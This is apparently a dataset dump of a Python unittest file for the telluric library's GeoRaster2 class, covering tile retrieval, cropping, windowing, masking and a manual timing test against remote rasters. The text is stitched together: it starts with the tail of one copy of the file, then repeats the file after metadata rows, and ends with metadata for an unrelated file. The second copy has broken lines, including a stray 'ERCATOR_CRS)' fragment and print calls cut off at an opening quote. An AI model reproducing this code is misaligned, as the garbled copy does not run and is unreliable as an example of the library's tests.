with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile11 = raster.get_tile(*tiles[11])
cropped_11 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[11])
self.assertEqual(tile11, cropped_11)
def test_crop_image_from_and_get_win_do_the_same_full_resolution(self):
bounds = (20, 13, 40, 15)
win = rasterio.windows.Window(bounds[0], bounds[1], bounds[2] - bounds[0], bounds[3] - bounds[1])
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
saved_raster = GeoRaster2.open(rf.name)
cropped_win = saved_raster.get_window(win)
cropped_image = raster._crop(bounds)
self.assertEqual(cropped_image, cropped_win)
@patch.object(GeoRaster2, '_crop')
def test_crop_use_crop_image_for_a_loaded_image(self, mock__crop):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
assert mock__crop.called_once
@patch.object(GeoRaster2, 'get_window')
def test_crop_use_get_window_for_a_not_loaded_image(self, mock_get_window):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
assert mock_get_window.called_once
def test_crop_returns_full_resolution_as_default(self):
coords = mercantile.xy_bounds(*tiles[17])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
_, win = raster._vector_to_raster_bounds(shape)
cropped = raster.crop(shape)
self.assertEqual(cropped.shape, (raster.num_bands, round(win.height), round(win.width)))
self.assertEqual(cropped.affine[0], raster.affine[0])
def test_memory_crop_returns_resized_resolution(self):
coords = mercantile.xy_bounds(*tiles[18])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
cropped = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[18])
self.assertEqual(cropped.shape, (raster.num_bands, 256, 256))
self.assertAlmostEqual(cropped.affine[0], MERCATOR_RESOLUTION_MAPPING[18], 2)
def test_geographic_crop(self):
raster = self.read_only_virtual_geo_raster_wgs84()
rhombus_on_image = Polygon([[0, 2], [1, 1], [2, 2], [1, 3]]) # in pixels
rhombus_world = raster.to_world(rhombus_on_image)
cropped = raster.crop(rhombus_world)
r = raster[0:2, 1:3]
assert cropped == r
def test_geographic_crop_with_resize(self):
coords = mercantile.xy_bounds(*tiles[17])
raster = self.read_only_virtual_geo_raster_wgs84()
vector = GeoVector(Polygon.from_bounds(*coords), crs=WEB_MERCATOR_CRS)
x_ex_res, y_ex_res = convert_resolution_from_meters_to_deg(
self.metric_affine[6], MERCATOR_RESOLUTION_MAPPING[17])
cropped = raster.crop(vector, (x_ex_res, y_ex_res))
self.assertAlmostEqual(cropped.affine[0], x_ex_res)
self.assertAlmostEqual(abs(cropped.affine[4]), y_ex_res, 6)
def test_crop_raises_error_for_impossible_transformation(self):
raster = self.read_only_virtual_geo_raster()
vector = GeoVector(Polygon.from_bounds(-180, -90, 180, 90), crs=WGS84_CRS)
with self.assertRaises(GeoRaster2Error):
raster.crop(vector)
def test_crop_of_rasters_with_opposite_affine_and_data_return_the_same(self):
array = np.arange(0, 20).reshape(1, 4, 5)
array2 = np.arange(19, -1, -1).reshape(1, 4, 5)
array2.sort()
image1 = np.ma.array(array, mask=False)
image2 = np.ma.array(array2, mask=False)
aff2 = Affine.translation(0, -8) * Affine.scale(2, 2)
aff = Affine.scale(2, -2)
r1 = GeoRaster2(image=image1, affine=aff, crs=WEB_MERCATOR_CRS)
r2 = GeoRaster2(image=image2, affine=aff2, crs=WEB_MERCATOR_CRS)
# r1 == r2 # doesn't work, see https://github.com/satellogic/telluric/issues/79
roi = GeoVector(Polygon.from_bounds(0, 0, 3, -3), crs=WEB_MERCATOR_CRS)
r1c = r1.crop(roi)
r2c = r2.crop(roi)
# r1c == r2c # doesn't work, see https://github.com/satellogic/telluric/issues/79
# currently this is the only way to test the result is the same
assert np.all(np.flip(r1c.image, axis=1) == r2c.image)
class GeoRasterMaskedTest(TestCase):
@classmethod
def setUpClass(cls):
cls.dir = TemporaryDirectory()
path = os.path.join(cls.dir.name, 'test_masked_raster.tif')
cls.masked_raster().save(path)
cls.read_only_vgr = GeoRaster2.open(path)
@classmethod
def tearDownClass(cls):
cls.dir.cleanup()
@classmethod
def masked_raster(cls):
data = np.array([
[0, 1, 1, 1],
[0, 2, 0, 2],
[0, 3, 3, 3],
], dtype=np.uint8)
mask = np.array([
[True, False, False, False],
[True, False, False, False],
[True, False, False, False],
], dtype=bool)
image = np.ma.array(
np.repeat(data[np.newaxis, :, :], 3, 0),
mask=np.repeat(mask[np.newaxis, :, :], 3, 0)
)
# Don't use exactly -1.0 for the affine for rasterio < 1.0a13, see
# https://github.com/mapbox/rasterio/issues/1272
affine = Affine.scale(1, -1.0001) * Affine.translation(0, -3)
crs = WGS84_CRS
return GeoRaster2(
image, affine=affine, crs=crs,
)
def read_only_virtual_geo_raster(self):
return self.read_only_vgr
def test_get_smaller_window_respects_mask(self):
window = Window(1, 0, 3, 3)
raster = self.read_only_virtual_geo_raster()
cropped = raster.get_window(window, masked=True)
assert (~cropped.image.mask).all()
def test_get_bigger_window_respects_mask(self):
window = Window(1, 0, 4, 3)
raster = self.read_only_virtual_geo_raster()
cropped = raster.get_window(window, masked=True)
assert cropped.image[:, :, -1].mask.all() # This line of pixels is masked
assert (~cropped.image[:, :, :-1].mask).all() # The rest is not masked
def test_small_read_only_virtual_geo_raster_wgs84_crop():
# See https://github.com/satellogic/telluric/issues/61
roi = GeoVector.from_bounds(xmin=0, ymin=0, xmax=2, ymax=2, crs=WGS84_CRS)
resolution = 1.0 # deg / px
raster = GeoRaster2.empty_from_roi(roi, resolution)
assert raster.crop(roi) == raster.crop(roi, raster.resolution())
@manualtest
class GeoRaster2ManualTest(TestCase):
"""manual testing To be run manually only."""
files = {
'original': 'original2.tif',
'cloudoptimized aligned': 'original2_aligned_cloudoptimized-2.tif',
'mrf aligned': 'original2_aligned.mrf',
'cloudoptimized': 'original2_cloudoptimized-2.tif',
'mrf': 'original2.mrf',
'not aligned cloudoptimized': 'not_aligned_cloudoptimized_2.tif',
'not aligned mrf': 'not_aligned.mrf',
'not aligned mrf split': 'not_aligned_split.mrf',
'aligned mrf split': 'original2_aligned_split.mrf',
'original mrf split': 'original2_split.mrf',
}
resamplings = {
# 'avarage': Resampling.average,
# 'nearest': Resampling.nearest,
# 'bilinear': Resampling.bilinear,
'cubic': Resampling.cubic
}
def random_string(self):
import hashlib
now = '%s' % datetime.now()
return hashlib.md5(now.encode('utf-8')).hexdigest()
def run_test_on_real_rasters(self, zoom, resampling, local):
results_arr = np.empty(shape=(len(self.files)), dtype=object)
# with rasterio.Env(CPL_DEBUG=True, GDAL_CACHEMAX=0):
# with rasterio.Env(CPL_DEBUG=False):
print('*' * 80)
print(zoom)
print('*' * 80)
print('#' * 80)
print(resampling.name)
print('#' * 80)
for i, (file_type, file_url) in enumerate(self.files.items()):
if local or 'split' in file_type:
base_url = './notebooks/'
else:
base_url = 'https://ariel.blob.core.windows.net/rastersfortest/'
file_url = base_url + file_url
if local and 'mrf' not in file_type:
new_file = file_url + self.random_string()
os.system("cp %s %s" % (file_url, new_file))
else:
new_file = file_url
print('file type: %s' % file_type)
print('-' * 80)
print('file_url: %s' % file_url)
print('new_file: %s' % new_file)
print('-' * 80)
vr = GeoRaster2.open(new_file)
start = datetime.now()
rasterio_ops = {
'CPL_DEBUG': True,
'GDAL_DISABLE_READDIR_ON_OPEN': 'YES'
}
if 'mrf' not in file_type:
rasterio_ops['CPL_VSIL_CURL_ALLOWED_EXTENSIONS'] = '.tif'
with rasterio.Env(**rasterio_ops):
vr.get_tile(*tiles[zoom], resampling=resampling)
end = datetime.now()
tt = (end - start).total_seconds() * 1000
print("stars time : %s end time: %s total: %s ms" % (start, end, tt))
results_arr[i] = "type: %s, zoom: %i, resampling: %s time: %s msec" % (file_type, zoom,
resampling.name, tt)
if local and 'mrf' not in file_type:
os.system("rm -f %s" % (new_file))
print('=' * 80)
print(results_arr)
def test_zoom_remote_11_resampling_cubic(self):
self.run_test_on_real_rasters(11, Resampling.cubic, False)
def test_zoom_remote_12_resampling_cubic(self):
self.run_test_on_real_rasters(12, Resampling.cubic, False)
def test_zoom_remote_14_resampling_cubic(self):
self.run_test_on_real_rasters(14, Resampling.cubic, False)
def test_zoom_remote_15_resampling_cubic(self):
self.run_test_on_real_rasters(15, Resampling.cubic, False)
def test_zoom_remote_17_resampling_cubic(self):
self.run_test_on_real_rasters(17, Resampling.cubic, False)
def test_zoom_remote_18_resampling_cubic(self):
self.run_test_on_real_rasters(18, Resampling.cubic, False)
| 41.684746
| 113
| 0.654591
|
import os
import rasterio
import mercantile
import numpy as np
import pytest
from tempfile import NamedTemporaryFile, TemporaryDirectory
from affine import Affine
from unittest import TestCase
from unittest.mock import patch
from datetime import datetime
from shapely.geometry import Polygon
from rasterio.enums import Resampling
from rasterio.windows import Window
from rasterio.crs import CRS
from telluric import GeoRaster2, GeoVector
from telluric.constants import WEB_MERCATOR_CRS, WGS84_CRS
from telluric.georaster import MERCATOR_RESOLUTION_MAPPING, GeoRaster2Error, GeoRaster2IOError
from telluric.util.general import convert_resolution_from_meters_to_deg
import sys
import logging
import tempfile
log = logging.getLogger('rasterio._gdal')
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
manualtest = pytest.mark.skipif("TEST_MANUAL" not in os.environ, reason="skip on auto testing")
window_data = pytest.mark.skip('pending decission of consistency in results between rasterio read and reproject')
framing = pytest.mark.skip('witing for framing and get_window with boundless false')
tiles = {
10: (579, 394, 10),
11: (1159, 789, 11),
12: (2319, 1578, 12),
14: (9277, 6312, 14),
15: (18554, 12624, 15),
17: (74216, 50496, 17),
18: (148433, 100994, 18)
}
class GeoRaster2TilesTestGeneral(TestCase):
def test_raise_exception_on_bad_file_path(self):
vr = GeoRaster2.open('stam')
with self.assertRaises(GeoRaster2IOError):
vr.get_tile(1, 2, 3)
def test_raise_exception_on_bad_raster_url(self):
vr = GeoRaster2.open('http://stam')
with self.assertRaises(GeoRaster2IOError):
vr.get_tile(1, 2, 3)
def test_raise_exception_on_bad_file_path_save_cog(self):
vr = GeoRaster2.open('stam')
with self.assertRaises(GeoRaster2IOError):
vr.save_cloud_optimized('dest_file')
def test_raise_exception_on_bad_raster_url_save_cog(self):
vr = GeoRaster2.open('http://stam')
with self.assertRaises(GeoRaster2IOError):
vr.save_cloud_optimized('dest_file')
class BaseGeoRasterTestCase(TestCase):
@classmethod
def setUpClass(cls):
path = "./tests/data/raster/raster_for_test.tif"
cls.read_only_vgr = GeoRaster2.open(path)
path = "./tests/data/raster/raster_wgs84.tif"
cls.read_only_vgr_wgs84 = GeoRaster2.open(path)
def read_only_virtual_geo_raster(self):
return self.read_only_vgr
def read_only_virtual_geo_raster_wgs84(self):
return self.read_only_vgr_wgs84
class GeoRaster2TestGetTile(BaseGeoRasterTestCase):
def test_geo_bounding_tile(self):
gr = self.read_only_virtual_geo_raster()
gv = gr.footprint().reproject(WGS84_CRS)
bounding_tile = mercantile.bounding_tile(*gv.get_shape(gv.crs).bounds)
self.assertEqual(bounding_tile, (37108, 25248, 16))
@patch.object(GeoRaster2, 'crop')
def test_fails_with_empty_raster_for_tile_out_of_raster_area(self, mock__crop):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
r = raster.get_tile(16384, 16383, 15)
self.assertTrue((r.image.data == 0).all())
self.assertTrue((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
self.assertEqual(r.crs, WEB_MERCATOR_CRS)
mock__crop.assert_not_called()
def test_get_all_raster_in_a_single_tile(self):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
p = raster.footprint().reproject(WGS84_CRS).centroid
r = raster.get_tile(*mercantile.tile(lng=p.x, lat=p.y, zoom=11))
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
self.assertEqual(r.crs, WEB_MERCATOR_CRS)
def test_get_tile_for_different_zoom_levels(self):
for raster in [self.read_only_virtual_geo_raster(), self.read_only_virtual_geo_raster_wgs84()]:
for zoom in tiles:
r = raster.get_tile(*tiles[zoom])
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_tile_from_different_crs_tile_is_not_tilted(self):
raster = self.read_only_virtual_geo_raster_wgs84()
r = raster.get_tile(*tiles[18])
self.assertEqual(1, len(np.unique(r.image.mask)))
def test_get_tile_from_different_crs_tile_is_not_tilted_with_different_buffer(self):
raster = self.read_only_virtual_geo_raster_wgs84()
os.environ["TELLURIC_GET_TILE_BUFFER"] = "0"
try:
r = raster.get_tile(*tiles[18])
except Exception:
del os.environ["TELLURIC_GET_TILE_BUFFER"]
self.assertEqual(2, len(np.unique(r.image.mask)))
def test_get_entire_all_raster(self):
vr = self.read_only_virtual_geo_raster()
roi = GeoVector.from_xyz(37108, 25248, 16)
r = vr.crop(roi)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.shape, (3, 612, 612))
def test_fails_with_empty_raster_for_tile_out_of_raster_area_with_no_tile_size(self):
vr = self.read_only_virtual_geo_raster()
roi = GeoVector.from_xyz(16384, 16383, 15)
r = vr.crop(roi)
self.assertTrue((r.image.data == 0).all())
self.assertTrue((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 1223, 1223))
def test_get_window_of_full_resolution(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 300)
r = vr.get_window(win)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 300, 300))
def test_get_window_resize_to_256(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 300)
r = vr.get_window(win, xsize=256, ysize=256)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_window_of_non_square_resize_to_256(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, xsize=256, ysize=256)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 256, 256))
def test_get_window_of_non_square_keeps_size_proportions_for_give_xsize(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, xsize=150)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 200, 150))
def test_get_window_of_non_square_keeps_size_proportions_for_give_ysize(self):
vr = self.read_only_virtual_geo_raster()
win = Window(0, 0, 300, 400)
r = vr.get_window(win, ysize=200)
self.assertFalse((r.image.data == 0).all())
self.assertFalse((r.image.mask).all())
self.assertEqual(r.image.shape, (3, 200, 150))
def test_get_window_width_height_correctness(self):
vr = self.read_only_virtual_geo_raster()
expected_height = 200
win = Window(0, vr.height - expected_height, 1, expected_height)
r = vr.get_window(win)
self.assertEqual(r.image.shape, (3, expected_height, 1))
class GeoRasterCropTest(BaseGeoRasterTestCase):
metric_affine = Affine(1, 0.0, 2653750, 0.0, -1, 4594461)
def test_crop_in_memory_and_off_memory_without_resizing_are_the_same(self):
coords = mercantile.xy_bounds(*tiles[18])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster2 = GeoRaster2.open(rf.name)
off_memory_crop = raster2.crop(shape)
raster2.image
in_memory_crop = raster2.crop(shape)
self.assertEqual(off_memory_crop, in_memory_crop)
@window_data
def test_crop_and_get_tile_do_the_same(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster2 = GeoRaster2.open(rf.name)
tile15 = raster2.get_tile(*tiles[15])
raster2.image
cropped15 = raster2.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped15)
@window_data
def test_crop_and_get_tile_do_the_same_when_image_is_populated(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
tile15 = raster.get_tile(*tiles[15])
raster._populate_from_rasterio_object(read_image=True)
cropped_15 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped_15)
@window_data
def test_crop_image_from_and_get_win_do_the_same_with_resize(self):
bounds = (2, 3, 4, 5)
win = rasterio.windows.Window(bounds[0], bounds[1], bounds[2] - bounds[0], bounds[3] - bounds[1])
xsize = round((bounds[2] - bounds[0]) / 2)
ysize = round((bounds[3] - bounds[1]) / 2)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster.save('area.tif', tags={'AREA_OR_POINT': 'Area'})
raster.save('point.tif', tags={'AREA_OR_POINT': 'Point'})
saved_raster = GeoRaster2.open(rf.name)
cropped_win = saved_raster.get_window(win, xsize=xsize, ysize=ysize)
saved_raster_area = GeoRaster2.open('area.tif')
cropped_win_area = saved_raster_area.get_window(win, xsize=xsize, ysize=ysize)
saved_raster_point = GeoRaster2.open('point.tif')
cropped_win_point = saved_raster_point.get_window(win, xsize=xsize, ysize=ysize)
cropped_image = raster._crop(bounds, xsize=xsize, ysize=ysize)
print('cropped_win_area pixels\n', cropped_win_area.image)
print('cropped_win_point pixels\n', cropped_win_point.image)
print('cropped_win pixels\n', cropped_win.image)
print('cropped_image pixels\n', cropped_image.image)
if (cropped_win_point == cropped_win_area):
print('point == area')
if (cropped_image == cropped_win_area):
print('image == area')
if (cropped_image == cropped_win_point):
print('image == point')
if (cropped_win == cropped_win_area):
print('win == area')
if (cropped_win == cropped_win_point):
print('win == point')
self.assertEqual(cropped_image, cropped_win)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_high_zoom(self):
coords = mercantile.xy_bounds(*tiles[17])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile17 = raster.get_tile(*tiles[17])
cropped_17 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[17])
self.assertEqual(tile17, cropped_17)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_mid_zoom(self):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile15 = raster.get_tile(*tiles[15])
cropped_15 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
self.assertEqual(tile15, cropped_15)
@framing
def test_crop_and_get_tile_do_the_same_when_image_is_populated_first_for_low_zoom(self):
coords = mercantile.xy_bounds(*tiles[11])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster._populate_from_rasterio_object(read_image=True)
tile11 = raster.get_tile(*tiles[11])
cropped_11 = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[11])
self.assertEqual(tile11, cropped_11)
def test_crop_image_from_and_get_win_do_the_same_full_resolution(self):
bounds = (20, 13, 40, 15)
win = rasterio.windows.Window(bounds[0], bounds[1], bounds[2] - bounds[0], bounds[3] - bounds[1])
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
saved_raster = GeoRaster2.open(rf.name)
cropped_win = saved_raster.get_window(win)
cropped_image = raster._crop(bounds)
self.assertEqual(cropped_image, cropped_win)
@patch.object(GeoRaster2, '_crop')
def test_crop_use_crop_image_for_a_loaded_image(self, mock__crop):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
assert mock__crop.called_once
@patch.object(GeoRaster2, 'get_window')
def test_crop_use_get_window_for_a_not_loaded_image(self, mock_get_window):
coords = mercantile.xy_bounds(*tiles[15])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
with NamedTemporaryFile(mode='w+b', suffix=".tif") as rf:
raster.save(rf.name)
raster = GeoRaster2.open(rf.name)
raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[15])
assert mock_get_window.called_once
def test_crop_returns_full_resolution_as_default(self):
coords = mercantile.xy_bounds(*tiles[17])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
_, win = raster._vector_to_raster_bounds(shape)
cropped = raster.crop(shape)
self.assertEqual(cropped.shape, (raster.num_bands, round(win.height), round(win.width)))
self.assertEqual(cropped.affine[0], raster.affine[0])
def test_memory_crop_returns_resized_resolution(self):
coords = mercantile.xy_bounds(*tiles[18])
shape = GeoVector(Polygon.from_bounds(*coords), WEB_MERCATOR_CRS)
raster = self.read_only_virtual_geo_raster()
cropped = raster.crop(shape, MERCATOR_RESOLUTION_MAPPING[18])
self.assertEqual(cropped.shape, (raster.num_bands, 256, 256))
self.assertAlmostEqual(cropped.affine[0], MERCATOR_RESOLUTION_MAPPING[18], 2)
def test_geographic_crop(self):
raster = self.read_only_virtual_geo_raster_wgs84()
rhombus_on_image = Polygon([[0, 2], [1, 1], [2, 2], [1, 3]])
rhombus_world = raster.to_world(rhombus_on_image)
cropped = raster.crop(rhombus_world)
r = raster[0:2, 1:3]
assert cropped == r
def test_geographic_crop_with_resize(self):
coords = mercantile.xy_bounds(*tiles[17])
raster = self.read_only_virtual_geo_raster_wgs84()
vector = GeoVector(Polygon.from_bounds(*coords), crs=WEB_MERCATOR_CRS)
x_ex_res, y_ex_res = convert_resolution_from_meters_to_deg(
self.metric_affine[6], MERCATOR_RESOLUTION_MAPPING[17])
cropped = raster.crop(vector, (x_ex_res, y_ex_res))
self.assertAlmostEqual(cropped.affine[0], x_ex_res)
self.assertAlmostEqual(abs(cropped.affine[4]), y_ex_res, 6)
def test_crop_raises_error_for_impossible_transformation(self):
raster = self.read_only_virtual_geo_raster()
vector = GeoVector(Polygon.from_bounds(-180, -90, 180, 90), crs=WGS84_CRS)
with self.assertRaises(GeoRaster2Error):
raster.crop(vector)
def test_crop_of_rasters_with_opposite_affine_and_data_return_the_same(self):
array = np.arange(0, 20).reshape(1, 4, 5)
array2 = np.arange(19, -1, -1).reshape(1, 4, 5)
array2.sort()
image1 = np.ma.array(array, mask=False)
image2 = np.ma.array(array2, mask=False)
aff2 = Affine.translation(0, -8) * Affine.scale(2, 2)
aff = Affine.scale(2, -2)
r1 = GeoRaster2(image=image1, affine=aff, crs=WEB_MERCATOR_CRS)
r2 = GeoRaster2(image=image2, affine=aff2, crs=WEB_MERCATOR_CRS)
ERCATOR_CRS)
r1c = r1.crop(roi)
r2c = r2.crop(roi)
# r1c == r2c # doesn't work, see https://github.com/satellogic/telluric/issues/79
assert np.all(np.flip(r1c.image, axis=1) == r2c.image)
class GeoRasterMaskedTest(TestCase):
@classmethod
def setUpClass(cls):
cls.dir = TemporaryDirectory()
path = os.path.join(cls.dir.name, 'test_masked_raster.tif')
cls.masked_raster().save(path)
cls.read_only_vgr = GeoRaster2.open(path)
@classmethod
def tearDownClass(cls):
cls.dir.cleanup()
@classmethod
def masked_raster(cls):
data = np.array([
[0, 1, 1, 1],
[0, 2, 0, 2],
[0, 3, 3, 3],
], dtype=np.uint8)
mask = np.array([
[True, False, False, False],
[True, False, False, False],
[True, False, False, False],
], dtype=bool)
image = np.ma.array(
np.repeat(data[np.newaxis, :, :], 3, 0),
mask=np.repeat(mask[np.newaxis, :, :], 3, 0)
)
# https://github.com/mapbox/rasterio/issues/1272
affine = Affine.scale(1, -1.0001) * Affine.translation(0, -3)
crs = WGS84_CRS
return GeoRaster2(
image, affine=affine, crs=crs,
)
def read_only_virtual_geo_raster(self):
return self.read_only_vgr
def test_get_smaller_window_respects_mask(self):
window = Window(1, 0, 3, 3)
raster = self.read_only_virtual_geo_raster()
cropped = raster.get_window(window, masked=True)
assert (~cropped.image.mask).all()
def test_get_bigger_window_respects_mask(self):
window = Window(1, 0, 4, 3)
raster = self.read_only_virtual_geo_raster()
cropped = raster.get_window(window, masked=True)
assert cropped.image[:, :, -1].mask.all() # This line of pixels is masked
assert (~cropped.image[:, :, :-1].mask).all() # The rest is not masked
def test_small_read_only_virtual_geo_raster_wgs84_crop():
# See https://github.com/satellogic/telluric/issues/61
roi = GeoVector.from_bounds(xmin=0, ymin=0, xmax=2, ymax=2, crs=WGS84_CRS)
resolution = 1.0 # deg / px
raster = GeoRaster2.empty_from_roi(roi, resolution)
assert raster.crop(roi) == raster.crop(roi, raster.resolution())
@manualtest
class GeoRaster2ManualTest(TestCase):
files = {
'original': 'original2.tif',
'cloudoptimized aligned': 'original2_aligned_cloudoptimized-2.tif',
'mrf aligned': 'original2_aligned.mrf',
'cloudoptimized': 'original2_cloudoptimized-2.tif',
'mrf': 'original2.mrf',
'not aligned cloudoptimized': 'not_aligned_cloudoptimized_2.tif',
'not aligned mrf': 'not_aligned.mrf',
'not aligned mrf split': 'not_aligned_split.mrf',
'aligned mrf split': 'original2_aligned_split.mrf',
'original mrf split': 'original2_split.mrf',
}
resamplings = {
# 'avarage': Resampling.average,
# 'nearest': Resampling.nearest,
# 'bilinear': Resampling.bilinear,
'cubic': Resampling.cubic
}
def random_string(self):
import hashlib
now = '%s' % datetime.now()
return hashlib.md5(now.encode('utf-8')).hexdigest()
def run_test_on_real_rasters(self, zoom, resampling, local):
results_arr = np.empty(shape=(len(self.files)), dtype=object)
# with rasterio.Env(CPL_DEBUG=True, GDAL_CACHEMAX=0):
# with rasterio.Env(CPL_DEBUG=False):
print('*' * 80)
print(zoom)
print('*' * 80)
print('
print(resampling.name)
print('
for i, (file_type, file_url) in enumerate(self.files.items()):
if local or 'split' in file_type:
base_url = './notebooks/'
else:
base_url = 'https://ariel.blob.core.windows.net/rastersfortest/'
file_url = base_url + file_url
if local and 'mrf' not in file_type:
new_file = file_url + self.random_string()
os.system("cp %s %s" % (file_url, new_file))
else:
new_file = file_url
print('file type: %s' % file_type)
print('-' * 80)
print('file_url: %s' % file_url)
print('new_file: %s' % new_file)
print('-' * 80)
vr = GeoRaster2.open(new_file)
start = datetime.now()
rasterio_ops = {
'CPL_DEBUG': True,
'GDAL_DISABLE_READDIR_ON_OPEN': 'YES'
}
if 'mrf' not in file_type:
rasterio_ops['CPL_VSIL_CURL_ALLOWED_EXTENSIONS'] = '.tif'
with rasterio.Env(**rasterio_ops):
vr.get_tile(*tiles[zoom], resampling=resampling)
end = datetime.now()
tt = (end - start).total_seconds() * 1000
print("stars time : %s end time: %s total: %s ms" % (start, end, tt))
results_arr[i] = "type: %s, zoom: %i, resampling: %s time: %s msec" % (file_type, zoom,
resampling.name, tt)
if local and 'mrf' not in file_type:
os.system("rm -f %s" % (new_file))
print('=' * 80)
print(results_arr)
def test_zoom_remote_11_resampling_cubic(self):
self.run_test_on_real_rasters(11, Resampling.cubic, False)
def test_zoom_remote_12_resampling_cubic(self):
self.run_test_on_real_rasters(12, Resampling.cubic, False)
def test_zoom_remote_14_resampling_cubic(self):
self.run_test_on_real_rasters(14, Resampling.cubic, False)
def test_zoom_remote_15_resampling_cubic(self):
self.run_test_on_real_rasters(15, Resampling.cubic, False)
def test_zoom_remote_17_resampling_cubic(self):
self.run_test_on_real_rasters(17, Resampling.cubic, False)
def test_zoom_remote_18_resampling_cubic(self):
self.run_test_on_real_rasters(18, Resampling.cubic, False)
| true
| true
|
790dc05f4c0d5872bd7a197900cdb588ebac477b
| 6,501
|
py
|
Python
|
client-autosense/sense/sqlite_syn.py
|
zxypic/PublicPic
|
8bec621e38955fb061220bf56c2961122651ff9d
|
[
"MIT"
] | null | null | null |
client-autosense/sense/sqlite_syn.py
|
zxypic/PublicPic
|
8bec621e38955fb061220bf56c2961122651ff9d
|
[
"MIT"
] | null | null | null |
client-autosense/sense/sqlite_syn.py
|
